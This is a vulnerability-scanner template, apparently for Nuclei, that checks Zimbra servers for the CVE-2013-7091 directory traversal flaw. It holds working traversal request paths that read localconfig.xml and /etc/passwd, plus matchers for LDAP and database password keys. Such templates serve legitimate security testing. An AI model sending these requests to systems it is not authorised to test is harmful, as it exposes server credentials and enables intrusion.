id: CVE-2013-7091

info:
  name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion
  author: rubina119
  severity: critical
  description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-7091
    - https://www.exploit-db.com/exploits/30085
    - https://www.exploit-db.com/exploits/30472
    - http://www.exploit-db.com/exploits/30085
  classification:
    cve-id: CVE-2013-7091
  tags: zimbra,lfi,edb,cve,cve2013

requests:
  - method: GET
    path:
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
      - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: word
        words:
          - "zimbra_server_hostname"
          - "zimbra_ldap_userdn"
          - "zimbra_ldap_password"
          - "ldap_postfix_password"
          - "ldap_amavis_password"
          - "ldap_nginx_password"
          - "mysql_root_password"
        condition: or

      - type: regex
        regex:
          - "root=.*:0:0"

# Enhanced by mp on 2022/02/24